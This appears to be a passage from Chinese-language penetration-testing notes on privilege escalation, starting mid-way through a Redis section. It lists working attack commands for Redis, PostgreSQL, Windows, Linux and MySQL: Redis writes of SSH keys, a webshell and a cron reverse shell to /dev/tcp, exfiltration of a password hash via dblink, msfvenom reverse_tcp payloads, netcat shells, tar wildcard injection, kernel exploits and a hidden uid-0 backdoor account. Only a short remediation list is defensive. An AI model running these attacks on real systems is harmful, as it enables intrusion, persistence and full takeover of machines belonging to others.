192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.63.130:6379> save
OK

save后可以直接利用公钥登录ssh

3.低权限写入webshell
192.168.63.130:6379> config set dir /var/www/html/
OK
192.168.63.130:6379> config set dbfilename shell.php
OK
192.168.63.130:6379> set x "<?php phpinfo();?>"
OK
192.168.63.130:6379> save
OK

然后执行命令:

root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
OK

写ssh-keygen公钥使用私钥登录

在以下条件下，可以利用此方法

Redis服务使用ROOT账号启动
服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。

首先在本地生成一对密钥：

root@kali:~/.ssh# ssh-keygen -t rsa

然后redis执行命令：

192.168.63.130:6379> config set dir /root/.ssh/
OK
192.168.63.130:6379> config set dbfilename authorized_keys
OK
192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.63.130:6379> save
OK

save后可以直接利用公钥登录ssh

低权限写webshell

当redis权限不高时，并且服务器开着web服务，在redis有web目录写权限时，可以尝试往web路径写webshell

192.168.63.130:6379> config set dir /var/www/html/
OK
192.168.63.130:6379> config set dbfilename shell.php
OK
192.168.63.130:6379> set x "<?php phpinfo();?>"
OK
192.168.63.130:6379> save
OK

修复方案：

注意：以下操作，均需重启 Redis 后才能生效。

绑定需要访问数据库的 IP。将 127.0.0.1 修改为需要访问此数据库的 IP 地址。

设置访问密码。在 Redis.conf 中 requirepass 字段后，设置添加访问密码。

修改 Redis 服务运行账号。以较低权限账号运行 Redis 服务，禁用账号的登录权限。

postgresql

PostgreSQL 是一款关系型数据库。其 9.3 到 11 版本中存在一处“特性”，管理员或具有“COPY TO/FROM PROGRAM”权限的用户，可以使用这个特性执行任意命令。连接-利用漏洞-执行-提权

https://blog.csdn.net/zy15667076526/article/details/111824500

https://vulhub.org/#/environments/postgres/

CVE-2018-1058

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

CVE-2019-9193

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

令牌窃取

进行远程过程调用时请求提升权限，然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身，还用于原始请求进程时，漏洞就会出现。

通过令牌窃取，多半可以拿到administrator权限

msf:    exploit/multi/handler

ps
steal_token 2572    #    如果这样失败了，那么请用下面的

use incognito    #    列出可利用的令牌
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

进程注入

进程注入提权是本地提权方式的一种较为老的安全技术了，利用的是注入进程的所有者实现权限共享机制，这类技术主要利用在 windows2008 之前操作系统上.所以我们需要学习后续的本地提权更多的手法才能有针对高版本的系统。下载地址

"C:\Documents and Settings\Administrator\桌面\processinjector\pinjector.exe" -p 332 cmd.exe 6688
nc 192.168.0.4 6688

https://www.blib.cn/soft/pexec.zip

烂土豆提权(配合令牌窃取)

https://hub.fastgit.xyz/ohpe/juicy-potato/tree/master/CLSID

单纯令牌窃取：Web 权限或本地提权，配合烂土豆提权：Web 或数据库等权限

过程：上传烂土豆-执行烂土豆-利用窃取模块-窃取 SYSTEM-成功

use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

dll劫持

原理：Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在，则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常，Windows 应用程序有其预定义好的搜索 DLL 的路径，它会根据下面的顺序进行搜索：

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory，CWD
6、在 PATH 环境变量的目录（先系统后用户）

过程：信息收集-进程调试-制作 dll 并上传-替换 dll-启动应用后成功

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10001 -f dll >/opt/xiaodi.dll

不带引号服务路径安全问题

原理：当 Windows 服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -f exe -o Program.exe

C:\Program Files\1.exe -f 
"C:\Program Files\1.exe" -f

过程：检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

sc start "服务名"

https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

不安全的服务权限配置问题

原理：即使正确引用了服务路径，也可能存在其他漏洞。由于管理配置错误，用户可能对服务拥有过多的权限，例如，可以直接修改它导致重定向执行文件。过程：检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

D:\权限提升\AccessChk\accesschk.exe -uwcqv "administrators" *
accesschk.exe -uwcqv "administrators" *
sc config "NewServiceName" binpath="C:\Program.exe"
sc start "NewServiceName"

IIS6.0栈溢出漏洞提权

PROPFIND 栈溢出漏洞 RCE CVE-2017-7269：exp:https://github.com/zcgonvh/cve-2017-7269，由对方向我们的msf反弹shell，最后也可以提权

Linux提权

信息收集

shell脚本，python脚本

漏洞探针

suggest脚本，suggest脚本2

上传到tmp目录，tmp是临时目录可读可写，记得chmod +x xxx给执行权限

SUID提权

chmod u+s 给予了 suid
chmod u-s 删除了 suid
使程序在运行中受到了 suid root 权限的执行过程导致

提权过程：探针是否有 SUID(手工或脚本)-特定 SUID 利用-利用吃瓜-GG

https://pentestlab.blog/2017/09/25/suid-executables/

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

如果存在

Nmap    Vim        find    Bash    More    Less    Nano    cp         mv

后缀，那么存在给予了s权限

touch batmanfuture
find batmanfuture -exec whoami \;
find batmanfuture -exec netcat -lvp 10001 -e /bin/sh \;

netcat 124.70.20.10 10001

内核漏洞

https://hub.fastgit.xyz/Jewel591/Privilege-Escalation

提权过程：连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG

#    把这个.c文件上传到对方linux服务器
gcc 45010.c -o 45010
chmod +x 45010
./45010
id

脏牛提权

https://blog.csdn.net/qq_36119192/article/details/97248374

exp：https://hub.fastgit.xyz/gbonacini/CVE-2016-5195，dcow.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'    #    拿到一个交互shell
./dcow

环境变量

配合 SUID 进行环境变量提权-本地用户环境，手写调用文件-编译-复制文件-增加环境变量-执行触发

这个提权需要满足两个条件，1) 满足suid    2) 本地提权

#include<unistd.h>
void main()
{
    setuid(0);
    setgid(0);
    system("ps");
}

gcc demo.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH
./shell
id

计划任务

第一种：路径问题

利用计划任务指向的文件的相对路径解析问题

cat /etc/crontab
#    默认在/usr/local/bin里面
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/kali/test.sh
chmod +x /home/kali/test.sh
/tmp/bash

第二种：命令问题

利用通配符配合命令参数自定义命令实现提权，不安全定时任务备份命令：

test.sh
shell
demo.c
backup.sh
--checkpoint-action=exec=sh test.sh
--checkpoint=1
当我们的定时认为执行backup.sh时，cd /home/undead/script;tar czf /tmp/backup.tar.gz *，这里的 * 就是通配符，当执行到--checkpoint=1时，这个checkpoint是crontab的打印进度条，最后执行exec=sh test.sh
这里会运行这个test.sh文件，我们这里可以在test.sh里面给/tmp/bash一个suid权限，然后

cd /home/undead/script;tar czf /tmp/backup.tar.gz *
#    这个第一条是我们普通权限查看crontab计划任务，如果发现了有计划任务里有如上备份文件内容，后有通配符
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1

./bash -p
id

参考命令：https://www.cnblogs.com/manong--/p/8012324.html

第三种：权限问题

利用不安全的权限分配操作导致的定时文件覆盖

正常我们对某文件给予执行权限是chmod +x shell.sh，但是如果管理员疏忽，执行了chmod 777 shell.sh，且该shell.sh是定时计划任务，那么我们就可以覆盖该文件，那么在计划任务执行该文件时，就会以root权限执行我们想执行的内容

可以首先查看定时任务： cat /etc/crontab
然后找到对应的目录执行命令查看该定时任务文件是否具备777权限：    ls -al
如果具备777权限，那么覆盖该文件，文件内容为你所执行的内容，比如：
ls >> /tmp/ls.txt    这样就是以root用户执行的内容，由此我们可以在里面写入反弹shell命令，拿到root的shell

MYSQL-linux下提权

利用 Mysql 提权 searchsploit，下载 mysql udf poc 进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so

wget https://xx.xx.xx.xx/1518.so
下载 1518 到目标服务器，进入数据库进行 UDF 导出

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建 do_system 函数调用
create function do_system returns integer soname '1518.so'；
select do_system('chmod u+s /usr/bin/find');
配合使用 find 调用执行
touch xiaodi
find xiaodi –exec "whoami" \;
find xiaodi –exec "/bin/sh" \;
id

1.提权环境，信息收集(SUID,定时任务,可能漏洞，第三方服务应用等)

2.最新相关漏洞要明确(关注点)，二次开发相关脚本学会展望(四个脚本)

3.本地 searchsploit 脚本及远程 exploitdb 站点搜索说明（简要使用）

4.其他提权方法如：密码复用，guid，sudo 等说明(运气，同理，鸡肋等)

SUDO 说明参考：https://www.freebuf.com/vuls/217089.html涉及资源：

sudo 误配提权-CVE-2021-3156

sudo 误配提权的一种利用手法是，查看 home/ 目录下是否 .sudo_as_admin_successful 文件，若有则可以输入当前低权账号的密码直接 sudo su 切换为 root 用户，而在已经获取当前账号的系统环境的前提下，要拿到低权账号的密码，虽然有门槛，但也不是不可能（如，翻找各类配置文件）
exp:
    https://github.com/Rvn0xsy/cve-2021-3156-plus

靶机 JIS-CTF-VulnUpload-CTF01 就是很好的一个案例。

首先，利用 web 漏洞拿到低权账号 technawi 的 meterpreter 会话：

接着，翻找文件找到其密码：

然后，发现 home/ 中存在 .sudo_as_admin_successful 文件：

最后，用 technawi 自己的密码切换为 root 用户：

脏管道提权-2022年新爆的linux提权漏洞

linux kernel 5.8 < 5.16.11

复现环境
    ubnutu 21.10 (内核 5.13-0.16)

exp:
    https://github.com/imfiver/cve-2022-0847

git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh

我在我的kali上成功提权

还原
    rm -rf /etc/passwd
    mv /tmp/passwd /etc/passwd

添加root权限账户
useradd -p `openssl passwd -1 -salt 'whalwl' 123456` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/whalwl whalwl